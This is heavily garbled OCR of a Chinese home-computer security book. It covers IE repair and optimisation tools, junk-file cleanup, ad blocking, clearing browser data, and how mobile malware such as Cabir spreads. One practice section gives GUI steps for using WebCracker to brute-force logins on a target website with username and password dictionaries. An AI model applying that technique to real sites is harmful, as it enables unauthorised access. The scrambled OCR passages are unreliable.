常规 | 安全 | 内 容 | 连接 | 程序 | 高 级 


了 克 禁止 击 用 工 巨 高 圾 项 
网 | 
属性 刘 采 


钨 
fee] 


文件 | 查看 | 收藏 | 工具 | 帮助 其 它 | 


[| 


选择 “帮助 ”选项 卡 ， 在 打开 的 界面 
中 用 户 可 以 根据 实际 需要 对 IE 菜单 的 帮助 
选项 进行 设置 。 


常 需 | 安全 | 内 容 | 连接 | 程序 | 高 级 


区 工 巨 高 汲 需 
克 禁用 更 改 高 级 页 设置 


厂 茜 止 用 广 使 朋 祭 示 


mad 区 ) 


中 


查看 | 收藏 | 工具 | 帮助 其 它 | 


| 


ma 和 各 
iw ls 


step 了 选择 “其 他 ”选项 卡 ， 在 打开 的 界面 
中 用 户 可 以 根据 实际 需要 对 JE 菜单 的 其 他 
选项 进行 设置 。 


堪 7 SE 
= 
到 。 三 厅 用 rz 外 部 商 款 
著 。 一 禁用 rz 引 件 自动 对 多 
时 
ee 
第 3 步 : IE 修复 的 设置 


在 “IE 修复 免疫 专家 ” 主 窗口 中 单 击 
od 


和 \ \ 

参 | 旬 | 诊 | 问 | | 
Tod] 77 括 闪 六 近况 后】 注册 而 各 出】 IT 全 时 
[ss 

6 

口 字 ] 和 入 用 夫 的 这 定 
a 

Duma 

更 页 

Drm 

修 更 IE 话 接 页 力 空 口 

Djesri 
中 1 人 丙 开光 音 的 区 辣 和 
EL 
日 3 PT 他 开始 信 员 | [ 国 Si | 
MR | rat | mkt | | rw 医 可 | ,各 


step 回 在 其 中 根据 需要 勾 选 “ 待 修复 的 项 
目 ” 列 表 中 的 相关 选项 ， 也 可 以 单 击 “全 
选 ” 按 钮 ， 将 要 修复 的 项 目 全 选 。 


记 


7 轿 件 


站 | 级 | 难 


EE | ,| 注册 款 这 从 


EE 


5 


[eR DJ 有 a | [ 国 RW | 


| 时 | 二 | 


step 图 单 去 “开始 修复 ”按钮 ， 即 可 开始 修 


息 ITRE 放 | 如 


复 IE 浏 览 器 中 经 常 被 莫 改 的 选项 。 修 复 完 
毕 后 ， 弹 出 一 个 信息 提示 框 ， 提 示 用 户 修 
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能 打开 新 窗口 的 问题 。 


| IE 不 艇 条 开 新 窗口 收复 只 x 


六 ToolbarlE 御 


S| | S| S| 


6 IE 村 复 放 尝 .该 功能 可 能 和 要 本 新 启动 Windows 才 能 生 允 ! 


El 


第 6 步 : IE 垃圾 清除 


a 旧 .| 筑 || 加 在 “JE 修复 免疫 专家 ” 主 窗口 中 单 击 
) Er ”按钮 ， 打 开 “ 木 马 分 析 专家 一 
清理 Windows 的 垃圾 文件 ”对 话 框 ， 在 其 中 
ER 单 击 “ 全 否 ” 按 钮 ， 将 “请 选择 要 扫描 的 垃 

在 “IE 修复 免疫 专家 ” 主 窗口 中 单 击 。 圾 文件 类 型 ”列表 框 中 的 所 有 类 型 选中 。 
“修复 IE 无 法 上 网 ”按钮 ， 打 开 一 个 信息 
提示 框 ， 在 其 中 提示 用 户 “如 果 系 统 能 够 

正常 上 网 ， 建 议 不 要 修复 ”。 


[ER a i i 


高 .全 站 | [国生 下 | | 区 昌 间 [:¥*n| 


售 直接 清除 这 专文 件 ”水 旱情 虐 99:98se23! 。 〇 将 垃圾 文件 移 至 回忆 站 
E2412 0 ] 


单 击 “确定” 按钮 ， 即 可 开始 修复 下 单 击 “ 扫 描 ” 按 钮 ， 即 可 开始 扫描 
不 能 上 网 的 问题 。 Windows 系 统 中 的 垃圾 文件 。 


第 5 步 : 修复 IE 不 能 打开 新 窗口 


Fy 在 “IE 修 复 免 疫 专家 ” 主 窗 口中 单 
击 “ 修 复 IE 不 能 打开 新 窗口 ”按钮 ， 打 开 
“修复 IE 不 能 打开 新 窗口 ”对 话 框 。 


号 修复 IE 不 能 打开 新 音 口 X 
[Le sa] IE EN 
[Sp 国 单 二 “修复 ”按钮 ， 弹 出 “修复 IE” 本 
对 话 框 ， 提 示 用 户 是 否 立 即 进行 修复 。 step 图 扫描 完成 后 ， 弹 出 “木马 分 析 专 家 ” 
CE 对 话 框 ， 提 示 用 户 扫描 完毕 ， 以 及 扫描 出 
该 功能 主要 用 于 解 天 IE 无 法 打开 新 室 口 链接 或 者 | 经 第 出 现 韭 法 短 作 的 来 的 垃圾 文件 个 数 。 
_ 本 二 分 析 专 家 x 
0 反手 充 毕 | 共 发 现 垃圾 文件 【2398]】 个 【269719KB ) 
[am | 
[Be 图 单 南 “ 是 ”按钮 ， 即 可 开始 修复 下 不 CE 
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[step 园 单 去 “确定 ”按钮 ， 返 回 到 “木马 分 
析 专 家 一 清理 Windows 的 垃圾 文件 ”对 话 框 
中 ， 单 击 “ 全 选 ” 按 钮 ， 将 扫描 出 来 的 垃 
圾 文件 全 部 选中 。 


EE 


国 25| [|#as] (ss 
直接 清 入 垃 志文 件 下 司 soseest 。 口 将 垃圾 文件 和 到 回收 站 
| 


单 击 “ 清 除 ” 按 钮 ， 即 可 开始 清除 所 
选 的 垃圾 文件 。 


青 理 Windovs 的 垃 拒 文件 


CT 


ion\atastore\Locs\edb chk 
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这 里 不 再 详 述 。 用 户 可 以 参照 对 IE 插 件 免 
疫 、 正 修复 等 的 操作 进行 学 习 。 


11.6.3 ”使 用 《IE 伴侣 》 


《IE 伴侣 〈IEMate) 》 是 一 款 基于 IE 
浏览 器 的 免费 修复 专家 软件 ， 从 易 用 、 安 
全 、 个 性 化 角度 通过 IE 修复 优化 浏览 器 性 
能 。《IE 伴 侣 》 为 Intermet Explorer 浏 览 器 量 
身 定制 了 诸多 实用 功能 ， 使 IE 浏 览 器 的 使 
用 变 得 更 加 有 趣 。 

使 用 《IE 伴 侣 》 快 速 修复 IE 浏 览 器 的 
具体 操作 步骤 如 下 。 

[tp 加 双击 下 载 《IE 伴 侣 》 安 装 程序 ， 打 开 
“欢迎 使 用 下 伴侣 安装 向 导 ” 对 话 框 。 


一 x 


1E 伴 但 欢迎 使 用 IE 伴侣 安装 向 导 

让 浏览 器 更 强 
即将 在 您 的 计算 机 上 安装 I2 件 侣 v1. 1.1_101226。 
建议 关闭 IE 浏览 器 后 继续 。 


e) 


点 击 安装 继续 , 点 击 取消 取消 安装 。 


WC) | 


EE [加 # | 肥 昌 晶 、 轨 再 慰 
旬 直接 清除 垃 志 文件 水晶 和 呈 m.stcexsl 。 O 将 垃 圳 区 件 徐 王 回收 站 


[step 图 清除 完毕 后 ， 弹 出 “清除 完毕 ”的 信 
息 提示 框 。 


木马 分 析 专家 x 


【i 清除 完毕 ! 


另外 ， 在 “IE 修复 免疫 专家 ” 主 窗 口 
中 还 可 以 通过 单 击 “BHO 插 件 ” 按 钮 、 
“Toolbar 插 件 ” 按 钮 、“DPF 插 件 ” 按 
钮 、“ 流 氓 软件 ”按钮 、“ 注 册 表 备份 ” 
按钮 等 对 系统 中 的 相关 插件 进行 管理 ， 


step 图 单 去 “下 一 步 ” 按 钮 ， 进 入 “许可 协 
议 ” 对 话 框 ， 用 户 在 安装 前 需要 阅读 其 中 
相关 的 许可 协议 。 


全 IE 伴 个 去 凌 过 x 
许可 协议 
在 安装 “IE 伴 但 ”之 前 ， 请 仔细 阅读 许可 协议 * 吉 
请 阅读 版 本 许可 * 
亚 伴 售 (IDtate) 安装 协议 和 


亚 伴侣 (IPrate) 是 由 爱 易 伴侣 公司 提供 的 软件 。 用 户 在 安装 IE 件 侣 
Meval te i 只 要 用 户 安装 此 软件 ， 即 表明 用 户 接受 本 


一 仅 供 个 人 非 商业 性 人 
er (Toete) » 》， 为 用 户 提供 升 v 


继续 前 必须 同意 其 中 的 条 教 。 


ES D0 


step 图 单 击 “我 接受 ”按钮 ， 进 入 “正在 
安装 ”对 话 框 ， 在 其 中 显示 了 程序 安装 的 
进度 。 
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全 IE 伴 个 去 装 
正在 安装 
“IE 伴侣 ”正在 安装 ， 请 等 候 加 
他 潮解 除 安装 程序 :C:\Programn PilesVIDatevaninst exe 
CE-S{) F—S(W > | MN) 
[step 罗 安装 完毕 后 ， 弹 出 “完成 下 伴侣 安装 


向 导 ” 对 话 框 ， 在 其 中 提示 用 户 IE 修 复 伴 
但 已 经 安装 在 系统 中 了 ， 勾 选 “ 运 行 IE 紧 
急 修复 工具 ” 复 选 框 。 

图 IE 作 但 支 装 至 

完成 IE 伴侣 安装 向 导 


IE 伴 但 
让 浏览 器 更 强 


© 


王 伞 侣 已 在 您 的 系统 安装 。 
单 击 [完成 全 )] ， 开 启 班 伴侣 配置 向 导 。 
如 果 您 的 IE 无 法 启动 ， 旗 i 式 IE 早 急 修 夏 工具 ! 


回 运 行 IE 紧急 修 夏 工具 


EB Ca 


[Es 国 单 让 “完成 ”按钮 ， 即 可 打开 “IE 伞 
侣 - 超 强 下 修复 工具 ”对 话 框 。 
中 IE 伴 但 - 者 3IE 修 复 I 上 x 


主页 修复 
回 开启 主页 保护 
spp Tr ern] 


百度 (推荐 ) 合用 空 和 页 


取消 () 


插件 修复 
修 夏 等 级 : 。 〇 低级 口 申 图 高 滁 


© po Me ns 


正 防 淡 寺 
回 启用 防火 境 


EE 了 上 二 、 林 攻关 
9 后 沿 ER ik 


正 伴 人 提示 您 当 您 8 浏览 器 不 能 正常 让 时 ， 请 使 用 本 程序 进行 做 夏 。 
修复 进度 : 


十 IE 任 个 - 让 强 |E 修 复工 具 x 
E23 
ER 
本] 育 和 AFl: [hapywwbaduam 
百度 (推荐 ) 使 用 空 和 页 
插件 修复 
@ 信 丰 等级。 〇 人 加 。 。 〇 中 凶 。。 加 高 
高 积 : 量 安全 、 二 争 、 快 可 的 浏览 方式 ! 愤 区 所 有 与 无关 的 括 
i 
类 寺 
和 回 启用 EN 炙 寺 
3) arc; 、 木 通过 天 条 进入 你 的 
” 
下 伴侣 提示 您 : 当 人 外 YE 浏 蜗 器 不 能 正 党 启动 时 ， 请 使 用 本 程序 进行 修 夏 。 
个 要 进 度 : 
取消 


[5 国 单 二 “立即 修复 ”按钮 ， 即 可 成 功 修 
复 被 自 改 的 IE 主 页 ， 并 弹出 修复 成 功 的 信 
息 提示 框 。 


1E 修 复 x 


@ 修复 成 功 , 多 的 IE 浏览 业已 正 荣 1 


[Eee 图 单 去 “确定 ”按钮 ， 即 可 关闭 信息 提 
示 框 ， 则 于 浏览 器 已 经 正常 工作 。 


x 
本 中- 国 kpo 一 站-6c| 园 BR-T.odnE . 


2 Sw 


ms Wm on wy Wm We 27 er FE 


Bai 阁 百度 


在 成 功 修 复 焉 后， 利用 《IE 伴 侣 》 还 
可 以 加 强 下 选项 的 设置 ， 具 体 的 操作 步骤 
如 下 。 


了 清 


立即 修 夏 


Sep 国 选择 “开始 ”一 “IE 伴侣 配置 ”菜单 


step 轩 在 “主页 修复 ”设置 区 域 中 的 “请 输 
入 网 址 ”文本 框 中 输入 想 要 开始 的 主页 ， 
并 勾 选 “开启 主页 保护 ” 复 选 框 。 
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项 ， 打 开 “ 增 强 选项 ”界面 ， 在 其 中 色 选 
相应 的 选项 ， 以 增强 IE 浏 览 器 的 功能 。 设 
完毕 后 ， 单 击 “ 保 存 设 置 ”按钮 即 可 。 
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[step 贺 选择 “实用 工具 ”选项 ， 进 入 “实用 
工具 ”界面 ， 在 其 中 色 选 相应 的 复 选 框 ， 
以 加 强 IE 浏 览 器 的 实用 功能 。 设 置 完 毕 
后 ， 单 击 “ 保 存 设置 ”按钮 即 可 。 


o x 
Bemaeieprion EE Er 外 
IE 伴侣 reais wzsiazn 国 
© ES, 
Er 
eee] 这 xmTR 
ee 
2 mi 
sir See FE A EO A 
Sh 
SMITH 
[一 - 局 em 二 
Mi MF 人 中 基 ca 刘 | 
BF 
raid 
fc mt 
ee ee 
i ene 网 和; ies 对 四， 二 个 扩 
ya ene 
i eth 旦 coeejs 对 所 ,全 :6 人， 分 入 证 
1 ent 
dP CIT 3 y| 


[Be 图 选择 “标签 栏 ” 选项， 进入 “标签 
栏 ” 界面 ， 在 其 中 用 户 可 以 根据 需要 选择 
是 否 启用 标签 栏 及 其 他 选项 。 设 置 完毕 
后 ， 单 击 “ 保 存 设置 ”按钮 即 可 。 


0 x 
ES iematescption 万 - oie See bd 
5 
3) aiseon 
本 
国美 辣 和 和 
的 用 介 导 29 而 椒 兰 抽 、 梧 E 守 站 当前 的 可 让 丙 副 
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tt 
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ee 3 
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SE 
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[step 回 选择 “和 饼 标 手势 ”选项 ， 进 入 “鼠标 
手势 ”界面 ， 在 其 中 用 户 可 以 根据 实际 需 
要 选择 是 否 启用 鼠标 手势 等 选项 。 


EF 
局 raaecrren 万 =- Era ms = 六 访 @ 


IE 


Or Re 


了 Bi 


es 
te he 
人 

| si 


Fe ba EE 


i 而 三 ] [ER 


[step 选择 “广告 过 滤 ” 选 项 ， 进 入 “广告 
过 滤 ” 界 面 ， 在 其 中 用 户 可 以 根据 实际 需 
要 设置 广告 过 滤 选 项 。 


| Bi 


| EE 


Bure runs 


ee 


step 图 选择 “快捷 代理 ”选项 ， 进 入 “快捷 
代理 设置 ”界面 ， 在 其 中 用 户 可 以 根据 需 
要 选择 是 否 启动 快捷 代理 及 其 他 代理 设置 
参数 。 


| Eiemateocton 


x 
Pp- 9| Elewe-- rales x ® 


IE sss12t 国 
© 后 售 息 。 sn! ia 全 | at 


人 ss 

| Wf 

二 击 “ 人 于” 流 

后 让 全 代理 reg 
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人 

TR 了: 
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[step 国 选择 “迷你 股票 ”选项 ， 进 入 “迷你 
股票 ”界面 ， 在 其 中 用 户 可 以 根据 需要 选 
择 是 否 启用 迷你 股票 选项 。 
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[step 轩 选择 “一 键 修复 ”选项 ， 进 入 “一 键 
修复 ”界面 ， 在 其 中 用 户 可 以 根据 需要 选 
择 修复 的 等 级 。 


ET 


Gr 


step 国 选择 “网 页 截图 ”选项 ， 进 入 “网 页 
截图 ”界面 ， 在 其 中 用 户 可 以 根据 需要 选 
择 是 否 启用 网 页 截图 选项 。 


ET 四 


| 局 wi 
] 
EE, nonome correa 
Wee Fe 
Ei | pho: ce 
A Mr ae 
C3 


step 图 选择 “首页 保护 ”选项 ， 进 入 “首页 
保护 ”界面 ， 在 其 中 用 户 可 以 根据 需要 选 
择 是 否 启用 首页 保护 选项 。 


lemateontion Dr- Glee ra ® 


(©) IE 伴侣 
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[图 选择 “本 防火 墙 ” 选项 ， 进 入 “IE 防 
火 墙 ” 界面 ， 在 其 中 用 户 可 以 根据 需要 先 
择 是 否 启用 IE 防火 墙 选项 。 

已 emoropron p-6 


| 
| © i 


mk 
上 机 了 由 9， 本 和 二 :同和 DI 
对: 和 IE， 检 村 本， 后 二 
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[El 


dt 
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step 了 加 选择 “隐私 保护 ”选项 ， 进 入 “隐私 
防护 ”界面 ， 在 其 中 用 户 可 以 根据 需要 设 
置 相应 的 隐私 保护 参数 。 
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站 -| Brine noe 


pe tp 
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实战 演练 


实战 演练 1 一 一 查看 加 密 网 页 的 源码 


现在 很 多 网 站 为 了 防止 被 黑客 复制 和 
修改 ， 常 常 给 自己 的 网 页 源码 加 密 ， 使 得 网 
页 源码 不 能 被 顺利 查看 。 那 么 怎么 才能 查看 
加 密 的 网 页 源码 呢 ? 下 面 介 绍 一 种 利用 在 线 
网 页 解密 功能 解密 网 页 的 方法 ， 就 是 利用 密 
码 破 解 工具 WebCracker 来 破解 。WebCracker 
可 以 通过 读 取 要 破解 的 用 户 名 列表 和 要 探索 
的 密码 字典 ， 对 需要 密码 的 网 站 进行 穷 举 破 
解 ， 具 体 的 操作 步骤 如 下 。 

下 载 并 运行 WebCracker 程 序 ， 即 可 打 
开 WebCracker 的 运行 主 窗口 。 


11.7 


分 别 单 击 “ 用 户 名 文件 ”文本 框 和 
“使 用 用 户 名 字典 ”文本 框 右 侧 的 图 标 避 ， 
在 弹出 的 对 话 框 中 选择 要 破解 的 用 户 名 列 
表 和 要 探测 的 密码 字典 ， 并 在 URL 地 址 栏 
中 输入 要 破解 的 目标 网 址 。 
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step 图 单 击 工具 栏 的 “开始 ”按钮 ， 即 可 开 
始 破 解 ， 状 会 显示 破解 的 进度 。 


Es 


在 破解 开始 后 ，WebCracker 软 件 会 
从 用 户 名 列表 和 密码 字典 中 不 断 读 出 用 
户 和 密码 ， 再 测试 其 是 否 可 以 通过 。 当 
测试 到 某 个 符合 要 求 的 用 户 名 和 密码 时 ， 
WebCracker 会 自动 发 出 声音 提醒 用 户 已 经 
破解 到 了 密码 ， 在 “发 现 密码 ”选项 卡 中 
可 以 进行 查看 。 


Step 图 单 击 其 中 的 某 项 ， 即 可 对 其 进行 复 
制 。 返 回 到 刚才 的 网 站 ， 在 其 中 输入 用 户 
名 和 密码 就 可 以 访问 加 密 网 页 的 源码 了 。 
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局 


员 线 策 呈 实战 演练 2 一 一 屏蔽 浏览 器 窗口 中 的 广告 


l 在 浏览 网 页 时 ， 除 了 遭遇 病毒 攻击 、 
网 速 过 慢 等 问题 外 ， 还 时 常 遭 受 铺天盖地 的 
广告 攻击 ， 利 用 焉 自 带 工具 可 以 屏蔽 广告 ， 
具体 的 操作 步骤 如 下 。 
打开 “Internet 选项 ”对 话 框 ， 在 
“安全 ”选项 卡 中 单 击 “ 自 定义 级 别 ” 
按钮 。 


渤 提 一 个 区 类 LJ 宣 看 或 重 字 全 记 轩 。 


Mrtranet 


这 IE 阳 于 Irtcrret 网 站 “人 活用 于 在 要 信任 
二 


这 区 类 的 安全 从 (1 
这 区 二 的 光 估 加: 中 到 融 


对 曲子 大 多 炊 网 站 


下 的 不 二 全 站 本 于 
不 各 下 的 ActiveX 天 件 
[| 
memer xploren) 


asvec、| 乓 
也 


SE AEE 


;step 图 打开 “安全 设置 -Internet 区 域 ” 对 话 
框 ， 在 “设置 ”列表 框 中 将 “活动 脚本 ” 
设置 为 “禁用 ”。 单 击 “ 确 定 ” 按 钮 ， 即 
可 屏蔽 一 般 的 弹出 窗口 。 
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EE 


但 提示 :还 可 以 在 “Internet 选项 ”对 话 框 
中 选择 “隐私 ”选项 卡 ， 勾 选 “ 启 用 弹出 
窗口 阻止 程序 ” 复 选 框 。 单 击 “ 确 定 ” 按 
钮 ， 即 可 屏蔽 一 般 的 弹出 窗口 。 
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11.8 小 试 身 手 


练习 1: 使 用 地 址 栏 进行 关键 词 搜索 

在 进行 网 络 搜索 时 ， 不 是 只 有 打开 搜 
索引 擎 网 站 ， 才 能 进行 内 容 搜索 ， 用 户 可 
以 直接 将 关键 词 输入 到 浏览 器 的 地 址 栏 中 
进行 搜索 查询 ， 具 体 的 操作 步骤 如 下 。 


step 国 在 地 址 栏 中 输入 “宠物 狗 ”。 
De sxe- sans x [FS i 
和 & 全 为 而 | 六 
有 大 攀 约 


step 图 按 Enter 键 ， 即 可 搜索 出 相关 结果 。 


局 引 | 四 9 和 网- 加 m 版 bn x 二 ~ ET 


2 


另外 ， 用 户 也 可 以 在 高 级 设置 中 对 地 
址 栏 搜索 方式 进行 设置 。 


练习 2: 清除 Microsoft Edge 中 的 浏览 
数据 


浏览 器 在 上 网 时 会 保存 很 多 的 上 网 
记录 ， 这 些 上 网 记录 不 但 随 着 时 间 的 增加 
越 来 越 多 ， 而 且 还 有 可 能 泄露 用 户 的 隐私 
信息 。 如 果 不 想 让 别人 看 见 自己 的 上 网 记 
录 ， 则 可 以 把 上 网 记录 删除 ， 具 体 的 操作 
步骤 如 下 。 

Estee 加 打开 Microsoft Edge 浏 览 器 ， 选 择 
“更 多 操作 ”下 的 “设置 ”选项 。 

将 此 页 固定 到 “开始 "屏幕 

开发 人 员工 具 

使 用 Internet Explorer 打开 

发 送 反馈 

扩展 

新 增 功 能 和 提示 

Wa 
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step 图 打开 “设置 ” 窗 格 ， 单 击 “ 清 除 浏 
览 数 据 ” 组 下 的 “选择 要 清除 的 内 容 ” 
按钮 。 


[Step 图 弹出 “清除 浏览 数据 ” 窗 格 ， 单 击 选 
中 要 清除 的 浏览 数据 内 容 ， 单 击 “ 清 除 ” 
按钮 。 


《 ”清除 测 蜗 赦 据 已 


图 浏 鉴 历史 记录 
贺 Cookie 和 保存 的 网 站 数据 
图 经 Wi 和 文件 


[ep 加 开始 清除 浏览 数据 ， 清 除 完成 后 ， 即 
可 看 到 历史 记录 中 所 有 的 浏览 记录 都 已 被 
清除 。 


”消除 浏览 数据 a 


图 浏览 历史 记录 
图 Cookie 和 保 右 的 网 站 数据 
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第 12 剖 ”移动 手机 的 安全 防护 策略 


当前 ， 随 着 无 线 传输 技术 和 手机 自身 智能 技术 的 不 断 发 展 ， 手 机 越 来 越 智能 化 ， 致 
使 越 来 越 多 的 病毒 木马 和 黑客 也 开始 扩大 其 攻击 的 范围 ， 即 从 传统 的 计算 机 发 展 到 基于 网 
络 的 攻击 ， 又 从 网 络 的 攻击 发 展 到 当前 针对 手机 的 攻击 和 破坏 。 本 章 介绍 移动 手机 的 防护 


策略 。 


12.1 手机 的 攻击 手法 

攻击 手机 常用 的 手法 就 是 使 用 手机 
病毒 。 由 于 受 目前 手机 所 处 的 “硬件 环 
境 ”“ 软 件 环境 ”“ 通 信 环 境 ”“ 人 为 环 
境 ” 限 制 ， 现 在 的 手机 非常 不 安全 ， 诸 如 
手机 操作 系统 的 漏洞 、 软 硬件 的 兼容 性 等 
问题 。 就 目前 的 情况 来 看 ， 黑 客 使 用 手机 
病毒 攻击 手机 的 传染 途径 有 如 下 几 个 。 


12.1.1 通过 网 络 下 载 


目前 ， 几 乎 所 有 的 手机 都 支持 网 络 
下 载 功能 ， 如 可 以 通过 手机 下 载 图 片 、 音 
乐 、 手 机 游戏 等 ， 另 外 ， 还 可 以 使 用 手机 
浏览 WAP 网 站 、 炒 股 、 聊 天 〔 使 用 移动 QQ 
和 微 信 ) 等 。 这 给 用 户 带 来 了 随时 随地 上 
网 的 乐趣 ， 同 时 ， 再 加 上 现在 的 GPRS、 
EDGE、CDMA 及 3G、4G 技 术 更 是 保证 
了 手机 上 网 的 速度 ， 因 此 ， 手 机 病毒 也 会 
像 电 脑病 毒 一 样 通过 网 络 来 感染 用 户 的 手 
机 ， 如 一 些 黑客 将 木马 病毒 与 手机 游戏 文 
件 捆 绑 在 一 起 ， 当 手机 用 户 将 该 文件 下 载 
到 自己 的 手机 并 运行 时 ， 手 机 就 会 感染 病 
毒 文件 ， 轻 者 将 会 把 手机 中 的 数据 信息 盗 
取 或 删除 等 ， 重 者 会 把 手机 的 核心 程序 破 
坏 掉 ， 从 而 造成 手机 的 频繁 开关 机 或 永远 
无 法 打开 ， 最 后 必须 拿 回 厂家 进行 维修 的 
严重 后 果 。 此 外 ， 还 有 一 些 手 机 病毒 将 自 
己 捆 绑 在 下 载 程序 中 ， 通 过 运营 商 的 无 线 
下 载 功能 通道 传播 。 

总 之 ， 随 着 越 来 越 多 的 人 使 用 手机 


访问 互联 网 和 下 载 文件 ， 手 机 病毒 对 手机 
的 攻击 将 是 一 个 “人 迫在眉睫 ”的 危险 。 如 
Commwarrior 手 机 病毒 ， 该 手机 病毒 最 早 是 
在 芬兰 被 发 现 ， 至 今 已 蔓延 到 了 很 多 个 国 
家 ， 中 了 该 病毒 的 手机 可 自动 读 取 手 机 用 
户 的 本 地 通讯 录 ， 并 逐个 号 码 发 送 隐 藏 病 
毒 文件 的 MMS 彩信) 信息 ， 包 含 视频 、 
音频 和 文本 等 多 种 文件 。 再 如 Skulls 病 毒 ， 
该 病毒 文件 可 以 替换 系统 应 用 程序 ， 并 使 
其 不 能 应 用 ， 只 能 接 打 电话 。 一 旦 手机 中 
了 Skulls 病 毒 ， 所 有 应 用 程序 图 标 都 被 替换 
为 山体 和 交叉 骨头 的 图 标 ， 而 且 图 标 也 不 
再 和 应 用 程序 关联 ， 手 机 的 上 网 、 短 信 、 
彩信 和 照相 等 功能 全 部 丧失 。 

侈 注意 : 一 旦 中 了 该 病毒 ， 千 万 不 要 急于 
重新 启动 手机 ， 否 则 就 只 有 格式 化 手机 了 。 


12.1.2 利用 红外 线 或 蓝牙 传输 


手机 病毒 除了 通过 网 络 下 载 进 行 传播 
外 ， 还 可 以 通过 手机 的 红外 线 和 蓝牙 功能 
进行 传播 ， 因 为 利用 手机 的 蓝牙 模块 和 红 
外 线 模块 可 以 实现 与 电脑 连接 的 目的 ， 所 
以 电脑 中 的 病毒 文件 可 以 传 入 手机 ， 进 而 
攻击 和 破坏 手机 的 相关 功能 。 

所 谓 蓝 牙 (Bluetooth) 技术 ， 实 际 上 
是 一 种 短 距离 无 线 电 技术 ， 利 用 “蓝牙 ” 
技术 能 够 有 效 地 简化 掌上 电脑 、 笔 记 本 电 
脑 和 移动 电话 手机 等 移动 通信 终端 设备 之 
间 的 通信 ， 也 能 够 成 功 地 简化 以 上 这 些 设 
备 与 Internet 之 间 的 通信 ， 从 而 使 这 些 现代 


通信 设备 与 因特网 之 间 的 数据 传输 变 得 更 
加 迅速 、 高 效 。 

当 手 机 用 户 通 过 蓝牙 或 红外 线 将 自己 
的 手机 和 电脑 连接 到 一 起 后 ， 电 脑 中 已 经 
存在 的 病毒 木马 文件 或 恶意 程序 就 会 借助 
蓝牙 传输 到 手机 中 ， 从 而 感染 手机 的 操作 
系统 和 应 用 程序 。 另 外 ， 木 马 病毒 通过 蓝 
牙 或 红外 线 感染 手机 不 仅仅 存在 于 手机 和 
电脑 之 间 ， 还 存在 于 两 部 手机 之 间 ， 即 当 
一 部 手机 的 蓝牙 功能 打开 后 ， 就 会 自动 搜索 
其 周围 半径 10m 左 右 的 手机 蓝牙 设备 与 之 配 
对 ， 配 对 成 功 后 就 可 以 互相 传播 数据 了 ， 而 
如 果 一 部 手机 中 存在 木马 病毒 文件 ， 就 会 传 
播 到 另 一 部 ， 从 而 使 其 感染 病毒 。 

通过 红外 线 或 蓝牙 来 攻击 手机 的 病毒 
文件 有 多 种 ， 常 见 的 就 是 Cabir〈 卡 比尔 ) 
病毒 ， 该 病毒 文件 主要 是 通过 蓝牙 近 距 离 
传播 ， 手 机 中 此 病毒 后 ， 除 了 电力 消耗 很 
快 ， 一 般 没 有 明显 的 特征 反应 。 但 是 ， 
Cabir 病 毒 会 改写 系统 启动 文件 ， 让 其 自 
身 随 系统 一 起 启动 ， 然 后 通过 蓝牙 不 停 地 
搜索 附近 是 否 有 配置 为 “可 见 ” 的 蓝牙 手 
机 ， 一 旦 发 现 就 会 将 自身 发 送出 去 ， 感 染 
其 他 设备 。 目 前 此 病毒 的 变种 很 多 ， 主 
要 是 增强 了 传播 功能 ， 另 外 在 安装 时 显 
示 的 名 称 由 原来 的 “Cabire” 变 得 越 来 越 
隐秘 ， 从 而 吸引 接收 者 运行 ， 而 且 部 分 
恶意 代码 还 能 替换 第 三 方 应 用 程序 文件 ， 
并 自我 复制 ， 甚 至 能 引起 系统 死机 及 不 
稳定 。 


12.1.3 ”短信 与 乱码 传播 


除 上 述 介绍 的 两 种 手机 病毒 传染 途径 
外 ， 手 机 病毒 还 会 借助 于 “病毒 短信 ”来 
攻击 手机 ， 因 为 一 般 的 手机 都 具有 发 送 和 
接收 短信 的 功能 ， 当 手机 用 户 接 收 到 一 些 
短信 后 ， 警 惕 性 不 高 ， 很 容易 打开 进行 查 
看 ， 这 提高 了 黑客 攻击 手机 的 成 功率 。 

一 般 中 了 “病毒 短信 ”的 手机 就 会 无 
法 提供 某 些 方面 的 服务 ， 同 时 病毒 短信 会 
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显示 一 些 怪 字 符 或 乱码 等 。 这 些 乱 码 有 时 
会 在 来 电 显示 中 出 现 ， 用 户 一 旦 接听 了 乱 
码 电话 ， 就 会 感染 病毒 ， 手 机 中 的 资料 将 
会 被 木马 病毒 修改 或 破坏 。 

常见 的 手机 短信 一 般 不 会 遭 到 木马 病 
毒 的 捆绑 ,但 是 ， 一 些 在 网 上 很 受 欢迎 的 
彩信 则 容易 被 木马 病毒 捆绑 ， 而 且 在 传播 
时 也 很 可 能 受到 恶意 程序 和 木马 病毒 的 
入 侵 与 修改 ， 使 其 成 功 携带 有 病毒 的 数 
据 ， 这 样 ， 当 手机 用 户 在 自己 的 手机 中 
查看 彩信 时 ， 病 毒 就 会 在 神 不 知 鬼 不 觉 的 
情况 下 进入 手机 系统 ， 但 是 对 于 传统 的 文 
字 短 信 来 说 ， 由 于 其 格式 简单 化 ， 病 毒 
文件 无 法 实现 捆绑 的 操作 。 当 手机 用 户 
在 网 上 下 载 一 些 时 尚 彩信 时 ， 一 定 要 提 
高 警惕 。 


12.1.4 利用 手机 BUG 传播 


智能 手机 除了 具有 像 CUP、 内 存 等 硬 
件 设置 外 ， 还 有 其 自己 的 操作 系统 ， 这 和 
电脑 中 的 Windows 操 作 系统 功能 原理 一 样 在 
管理 着 硬件 设备 。 同 时 ， 手 机 操作 系统 也 
和 电脑 中 的 操作 系统 一 样 需要 及 时 安装 漏 
洞 补丁 ， 否 则 黑客 就 会 利用 手机 漏洞 来 实 
现 攻 击 的 目的 。 


12.2 ”手机 的 防护 策略 


现在 一 些 “终止 应 用 程序 ”“ 衍 生 
变种 家 族 ”“ 无 线 入 侵 ”“ 伪 装 免费 软 
件 ”“ 窃 取 资 讯 ” 等 电脑 病毒 常见 的 破坏 
手法 ， 现 在 的 手机 病毒 也 跟着 模仿 来 入 侵 
手机 用 户 ， 可 以 说 手机 病毒 已 经 在 我 国 初 
露 端倪 。 不 过 ， 手 机 用 户 也 不 要 太 过 担 
心 ， 因 为 手机 病毒 的 危害 性 还 不 是 很 大 ， 
其 影响 的 范围 也 有 一 定 的 局 限 性 。 如 果 用 
户 使 用 的 是 一 款 很 普通 的 手机 ， 那 么 其 中 
病毒 的 概率 几乎 是 零 ， 而 如 果 使 用 的 具有 
上 网 功能 WAP 手 机 或 智能 手机 ， 也 可 以 通 
过 一 些 防范 措施 来 保护 手机 的 安全 。 
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黑客 攻防 与 电脑 安全 从 新 手 到 高 手 〈 微 视频 + 火力 升级 版 ) 


12.2.1 关闭 手机 蓝牙 功能 


